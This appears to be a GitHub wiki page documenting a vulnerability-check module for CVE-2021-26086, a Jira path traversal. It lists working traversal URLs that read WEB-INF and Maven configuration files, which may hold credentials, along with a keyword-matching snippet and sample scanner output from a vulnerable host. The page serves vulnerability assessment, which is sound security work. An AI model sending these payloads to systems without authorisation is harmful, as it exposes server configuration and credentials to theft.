CVE‐2021‐26086 - carnal0wnage/J-PWN GitHub Wiki

CVE-2021-26086

Category: [Information Disclosure]

module name: check_cve_2021_26086

urls:

/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

[CG] this one differs from the other similar path traversals in that you can get to /WEB-INF/ folder which might actually have creds in it

it also attempt to validate you have sensitive data in the files:

if response.status_code == 200 and any(keyword in chunk for keyword in ["dependency", "web-app", "filter", "filter-mapping"]):
contains_sensitive_data = True

Example true positive and not vuln to CVE-2020-29453 (same host)

INFO: Checking for CVE-2020-29453
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml

INFO: Checking for CVE-2021-26086
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/web.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/decorators.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties